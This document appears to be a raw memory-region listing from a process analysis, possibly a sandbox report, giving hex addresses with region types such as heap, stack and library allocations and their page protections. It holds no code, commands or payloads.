trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
15B7000
heap
page read and write
6C61000
heap
page read and write
11D0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
6810000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
4D3B000
trusted library allocation
page read and write
6C61000
heap
page read and write
6B1E000
stack
page read and write
6470000
trusted library allocation
page read and write
6C61000
heap
page read and write
88F0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
105D000
heap
page read and write
8950000
trusted library allocation
page read and write
50A0000
heap
page read and write
2CF0000
heap
page read and write
6D30000
trusted library allocation
page read and write
772E000
unkown
page read and write
6C61000
heap
page read and write
8D90000
trusted library allocation
page read and write
905C000
stack
page read and write
8EA0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8BD0000
trusted library allocation
page read and write
105C000
heap
page read and write
8EA0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8ED0000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
646C000
stack
page read and write
5B50000
trusted library allocation
page read and write
5260000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
8B0E000
trusted library allocation
page read and write
1056000
heap
page read and write
6D30000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
5C51000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
6487000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
12E4000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
5C1D000
trusted library allocation
page read and write
6C61000
heap
page read and write
4D4B000
trusted library allocation
page read and write
294042F0000
heap
page read and write
880B000
trusted library allocation
page read and write
69A0000
trusted library allocation
page read and write
56CF000
stack
page read and write
7B2000
unkown
page readonly
68C0000
trusted library allocation
page read and write
4BB3000
trusted library allocation
page read and write
8D10000
trusted library allocation
page execute and read and write
6D40000
trusted library allocation
page read and write
8D75000
trusted library allocation
page read and write
5C42000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
529E000
stack
page read and write
8D40000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
10DE000
stack
page read and write
8A80000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
4E58000
heap
page read and write
6D40000
trusted library allocation
page read and write
4ED9000
heap
page read and write
8D20000
trusted library allocation
page read and write
5420000
trusted library section
page readonly
8B10000
trusted library allocation
page read and write
79D0000
trusted library allocation
page execute and read and write
53E0000
trusted library allocation
page execute and read and write
5C45000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8BE0000
trusted library allocation
page read and write
59F0000
heap
page read and write
1039000
heap
page read and write
8BA0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
79B7000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
549F000
stack
page read and write
2E50000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
6BFE000
stack
page read and write
8CE0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
4A72000
trusted library allocation
page read and write
7A7E000
stack
page read and write
5C30000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
65B0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4B77000
heap
page read and write
5530000
heap
page read and write
4BB3000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
8A05000
trusted library allocation
page read and write
408B000
trusted library allocation
page read and write
1200000
heap
page read and write
4BB3000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
16BF000
stack
page read and write
5700000
trusted library allocation
page read and write
79F0000
unkown
page read and write
6C61000
heap
page read and write
9FE0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
104E000
heap
page read and write
5B50000
trusted library allocation
page read and write
8860000
unkown
page read and write
8910000
trusted library allocation
page read and write
8B07000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
4ADE000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
8820000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
2728000
heap
page read and write
8910000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
5800000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
2E46000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D87000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
5210000
heap
page read and write
6D40000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
4C89000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
6E6E000
unkown
page read and write
5B50000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
5990000
direct allocation
page read and write
6D40000
trusted library allocation
page read and write
6C61000
heap
page read and write
6C61000
heap
page read and write
444D000
trusted library allocation
page execute and read and write
5B50000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
6E10000
unkown
page read and write
5560000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
5B10000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page execute and read and write
89F0000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
105D000
heap
page read and write
5C5D000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6925000
trusted library allocation
page read and write
8D05000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
6820000
trusted library allocation
page read and write
5956000
direct allocation
page read and write
105C000
heap
page read and write
16C000
stack
page read and write
5BB0000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
6D4A000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5B60000
trusted library allocation
page read and write
5BF5000
heap
page read and write
5C5D000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
98F3000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
4638000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
4BA6000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
5170000
heap
page read and write
13D0000
heap
page execute and read and write
5B50000
trusted library allocation
page read and write
6960000
trusted library allocation
page read and write
9102000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
6D53000
trusted library allocation
page read and write
51F9000
stack
page read and write
798B000
stack
page read and write
8D90000
trusted library allocation
page read and write
1049000
heap
page read and write
89F0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
411A000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
4C53000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
1062000
heap
page read and write
1050000
heap
page read and write
CFD0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
1450000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
12CF000
stack
page read and write
5C5D000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
4DCF000
stack
page read and write
6C61000
heap
page read and write
8A30000
trusted library allocation
page read and write
78CF000
trusted library allocation
page read and write
3104000
trusted library allocation
page read and write
6C61000
heap
page read and write
F20000
heap
page read and write
8AD0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8B80000
trusted library allocation
page read and write
8846000
trusted library allocation
page read and write
6C61000
heap
page read and write
6160000
trusted library allocation
page read and write
116F000
heap
page read and write
8D00000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
4B9D000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
40C1000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
4C47000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
4E01000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
4400000
heap
page read and write
8845000
unkown
page read and write
6C61000
heap
page read and write
8ED0000
trusted library allocation
page read and write
1067000
heap
page read and write
79A6000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
7A05000
trusted library allocation
page read and write
8A89000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
78A0000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
6EB0000
trusted library allocation
page read and write
8855000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C29000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
5C36000
trusted library allocation
page read and write
797E000
stack
page read and write
4BA7000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
4BB6000
trusted library allocation
page read and write
6C60000
heap
page read and write
79A5000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
6D00000
direct allocation
page read and write
8EC0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
6C61000
heap
page read and write
8E70000
trusted library allocation
page read and write
8970000
trusted library allocation
page read and write
5C26000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
12C000
stack
page read and write
8D90000
trusted library allocation
page read and write
79E0000
unkown
page read and write
8A90000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
5090000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C2F000
trusted library allocation
page read and write
5150000
trusted library allocation
page read and write
6B30000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
5C5D000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
5445000
heap
page read and write
4ACE000
trusted library allocation
page read and write
56D0000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
6EC0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
8B40000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
4ED6000
heap
page read and write
8BE0000
unkown
page read and write
8840000
trusted library allocation
page read and write
5B0F000
stack
page read and write
78D0000
unkown
page read and write
79B7000
trusted library allocation
page read and write
6C61000
heap
page read and write
5210000
trusted library allocation
page read and write
1058000
heap
page read and write
5B50000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5464000
heap
page read and write
5B50000
trusted library allocation
page read and write
6D43000
trusted library allocation
page read and write
5450000
heap
page read and write
8ED0000
trusted library allocation
page read and write
6FA0000
stack
page read and write
6C80000
direct allocation
page read and write
57C0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5F30000
trusted library allocation
page read and write
6C61000
heap
page read and write
522E000
trusted library allocation
page read and write
7526000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
105C000
heap
page read and write
6E48000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
103F000
heap
page read and write
8A80000
unkown
page read and write
8B37000
trusted library allocation
page read and write
1062000
heap
page read and write
8A80000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
30A4000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5B60000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
6830000
trusted library allocation
page read and write
8C80000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
71F8000
direct allocation
page read and write
5C5D000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
6EEE000
stack
page read and write
5B50000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
68E9000
trusted library allocation
page read and write
D1D7000
trusted library allocation
page read and write
6C61000
heap
page read and write
5614000
heap
page read and write
7B90000
unkown
page read and write
8D30000
trusted library allocation
page read and write
8BC0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
545E000
heap
page read and write
79B0000
trusted library allocation
page read and write
8D50000
trusted library allocation
page execute and read and write
5440000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6890000
trusted library allocation
page read and write
5C45000
trusted library allocation
page read and write
5452000
heap
page read and write
1144000
heap
page read and write
30CD000
heap
page read and write
8A01000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5459000
heap
page read and write
8A10000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
6C61000
heap
page read and write
5A0E000
stack
page read and write
5C6C000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
6C61000
heap
page read and write
5A9F000
stack
page read and write
4D5A000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
79E0000
trusted library allocation
page execute and read and write
1061000
heap
page read and write
79B3000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
4D78000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8E1E000
stack
page read and write
7940000
trusted library allocation
page read and write
54EB000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
9127000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D72000
trusted library allocation
page read and write
6C40000
direct allocation
page read and write
8B30000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5C41000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
3102000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
E60000
trusted library allocation
page read and write
1062000
heap
page read and write
8D90000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C12000
trusted library allocation
page read and write
6C61000
heap
page read and write
8920000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6C61000
heap
page read and write
98F3000
trusted library allocation
page read and write
5B55000
trusted library allocation
page read and write
6800000
trusted library allocation
page read and write
5100000
trusted library allocation
page read and write
4BC2000
trusted library allocation
page read and write
2F95000
heap
page read and write
8840000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5450000
trusted library allocation
page read and write
6C61000
heap
page read and write
8EA0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8938000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
100F000
heap
page read and write
5C5D000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
5C32000
trusted library allocation
page read and write
5910000
direct allocation
page read and write
8A8A000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7995000
unkown
page read and write
4DC0000
remote allocation
page read and write
5B50000
trusted library allocation
page read and write
7B90000
unkown
page read and write
8830000
trusted library allocation
page read and write
5C60000
trusted library allocation
page read and write
4BA9000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
4BE5000
trusted library allocation
page read and write
4C36000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4EC8000
heap
page read and write
8EA0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6C61000
heap
page read and write
2EA0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
B30000
heap
page read and write
8930000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
89E0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6EA0000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
40BF000
stack
page read and write
5B80000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
105C000
heap
page read and write
7920000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C2F000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
8EA000
stack
page read and write
7B90000
trusted library allocation
page read and write
68E3000
trusted library allocation
page read and write
6900000
trusted library allocation
page read and write
27CF000
heap
page read and write
79A0000
trusted library allocation
page read and write
5428000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
545E000
heap
page read and write
7A00000
trusted library allocation
page read and write
53AE000
stack
page read and write
7990000
unkown
page read and write
54E0000
trusted library allocation
page execute and read and write
6C61000
heap
page read and write
10CD000
heap
page read and write
5565000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6FA7000
stack
page read and write
4477000
trusted library allocation
page execute and read and write
4BA7000
trusted library allocation
page read and write
8640000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
59E0000
trusted library allocation
page execute and read and write
8835000
trusted library allocation
page read and write
7B0A000
stack
page read and write
7930000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
4C0F000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6C61000
heap
page read and write
9127000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
5080000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
4EB3000
heap
page read and write
6C62000
heap
page read and write
79A0000
trusted library allocation
page read and write
69C0000
trusted library allocation
page read and write
78D0000
unkown
page read and write
8A20000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
4460000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
7930000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
26C0000
heap
page read and write
5C5D000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
AB0000
heap
page read and write
8EB0000
trusted library allocation
page read and write
5C2F000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
4720000
trusted library allocation
page read and write
1120000
trusted library allocation
page read and write
6E60000
trusted library allocation
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
8A06000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
8CC8000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
2D08000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8C20000
unkown
page read and write
6E30000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
54E1000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
7311000
direct allocation
page read and write
8850000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6C61000
heap
page read and write
8835000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
544F000
stack
page read and write
8ED0000
trusted library allocation
page read and write
5B80000
trusted library allocation
page read and write
8810000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
30B0000
heap
page execute and read and write
2DDE000
stack
page read and write
8830000
trusted library allocation
page read and write
2E9D000
stack
page read and write
5C39000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8D85000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8A37000
trusted library allocation
page read and write
8B00000
trusted library allocation
page execute and read and write
61A0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
632D000
stack
page read and write
98D9000
trusted library allocation
page read and write
4BE9000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
7B90000
unkown
page read and write
29404402000
heap
page read and write
6FB0000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
5C55000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
50FF000
stack
page read and write
5C43000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
79A0000
unkown
page read and write
8870000
trusted library allocation
page read and write
4781000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
8A30000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
6C61000
heap
page read and write
57B2000
trusted library allocation
page read and write
6E3C000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4BA7000
trusted library allocation
page read and write
5580000
heap
page read and write
5565000
trusted library allocation
page read and write
8BB1000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
E8C000
stack
page read and write
98F0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
77F0000
unkown
page read and write
D30E000
stack
page read and write
5C1E000
trusted library allocation
page read and write
6EC0000
trusted library allocation
page read and write
8ED7000
trusted library allocation
page read and write
6C61000
heap
page read and write
4475000
trusted library allocation
page execute and read and write
7EFE0000
trusted library allocation
page execute and read and write
4112000
trusted library allocation
page read and write
6C61000
heap
page read and write
8A20000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
3088000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
4BB3000
trusted library allocation
page read and write
910000
remote allocation
page read and write
53FA000
heap
page read and write
6DDE000
stack
page read and write
6D30000
trusted library allocation
page read and write
792E000
unkown
page read and write
6D43000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
4272000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
103A000
heap
page read and write
8A90000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
5C39000
trusted library allocation
page read and write
3110000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
3332000
trusted library allocation
page read and write
74F1000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
8CE0000
unkown
page read and write
8D79000
trusted library allocation
page read and write
5710000
heap
page execute and read and write
8EB0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
C0000
heap
page read and write
5C24000
trusted library allocation
page read and write
1167000
trusted library allocation
page execute and read and write
5C24000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
5C14000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
5C2A000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
5500000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C38000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
5150000
trusted library allocation
page read and write
5411000
heap
page read and write
8ED0000
trusted library allocation
page read and write
5464000
heap
page read and write
7B90000
trusted library allocation
page read and write
4BB5000
trusted library allocation
page read and write
5423000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
878C000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
6C61000
heap
page read and write
8ED0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5B51000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C28000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D30000
trusted library allocation
page read and write
1040000
heap
page read and write
6D40000
trusted library allocation
page read and write
4DC0000
remote allocation
page read and write
4E85000
heap
page read and write
8A10000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
53ED000
heap
page read and write
5C5F000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
1218000
heap
page read and write
7BC000
stack
page read and write
78C0000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6DF0000
heap
page read and write
5B50000
trusted library allocation
page read and write
1317000
trusted library allocation
page execute and read and write
4760000
trusted library allocation
page execute and read and write
5C2B000
trusted library allocation
page read and write
6FD0000
stack
page read and write
53D8000
heap
page read and write
8CC0000
trusted library allocation
page read and write
4BB6000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
6C61000
heap
page read and write
8A00000
trusted library allocation
page read and write
4620000
trusted library allocation
page readonly
5C5D000
trusted library allocation
page read and write
267E000
stack
page read and write
8ED0000
trusted library allocation
page read and write
8A30000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C2F000
trusted library allocation
page read and write
4DF9000
trusted library allocation
page read and write
4B80000
trusted library allocation
page read and write
71E0000
direct allocation
page read and write
1064000
heap
page read and write
8850000
trusted library allocation
page read and write
513E000
stack
page read and write
8ED5000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
4F5E000
trusted library allocation
page read and write
8A2F000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
5480000
trusted library allocation
page read and write
5C15000
trusted library allocation
page read and write
5C3E000
trusted library allocation
page read and write
68C0000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
6E70000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
7990000
unkown
page read and write
470D000
stack
page read and write
61B0000
